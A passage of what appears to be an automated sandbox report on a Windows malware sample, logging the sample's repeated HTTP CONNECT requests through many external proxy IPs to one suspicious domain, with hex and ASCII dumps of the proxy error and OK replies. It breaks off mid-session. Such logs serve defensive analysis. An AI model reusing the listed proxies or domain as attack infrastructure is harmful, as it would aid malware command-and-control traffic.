                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1246192.168.2.453617199.188.92.4780006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.999582052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.160712957 CET1286INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: squid/4.15
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3594
                                                                                                      X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Proxy-Authenticate: Basic realm="SC-Proxy"
                                                                                                      X-Cache: MISS from out.domain.net
                                                                                                      X-Cache-Lookup: NONE from out.domain.net:8000
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 43 61 63 68 65 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Cache Access Denied</title><style type="text/css">... /* * Copyright (C) 1996-2021 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1247192.168.2.45318066.248.237.89646726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.003736973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178373098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179358006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.365915060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:50.381181955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:02.381148100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1248192.168.2.453183207.180.234.220495866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.012789011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.589550018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1249192.168.2.45365137.187.77.58495076812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.029479027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1250192.168.2.453219190.24.40.7098126812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.046611071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.115348101 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1251192.168.2.453165145.239.2.102285016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.046714067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178330898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1252192.168.2.453532119.28.60.6480906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.059170008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1253192.168.2.45274845.225.207.1869996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.078870058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.238756895 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1254192.168.2.453687172.67.150.173806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.079816103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.167625904 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1255192.168.2.453749202.159.30.814436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.080076933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1256192.168.2.453698104.16.106.154806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.080781937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.168044090 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1257192.168.2.453648213.194.131.64806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.080879927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.284554958 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1258192.168.2.453702162.159.242.104806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.081054926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.168425083 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1259192.168.2.453517115.239.234.4373026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.081465006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.432495117 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1260192.168.2.453703162.241.46.40607086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.108213902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.475056887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1261192.168.2.453674184.170.249.6541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.108230114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1262192.168.2.453738104.16.105.182806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.111408949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.206547976 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1263192.168.2.453742104.16.106.65806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.111958027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.207315922 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1264192.168.2.453662154.236.176.2819816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.130577087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1265192.168.2.45364013.234.24.11610806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.138159990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.420454979 CET28INHTTP/1.1 502 Bad Gateway


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1266192.168.2.452721103.160.207.49326506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.144093990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.533816099 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1267192.168.2.453766202.159.30.814436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.154516935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1268192.168.2.45376743.134.230.1454436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.154761076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1269192.168.2.45377043.134.230.1454436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.155694962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1270192.168.2.453769202.159.30.814436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.155874968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1271192.168.2.45377243.134.230.1454436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.156394958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1272192.168.2.453773202.159.30.814436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.156860113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1273192.168.2.45377543.134.230.1454436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:26.160887957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1274192.168.2.45363443.132.212.77806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
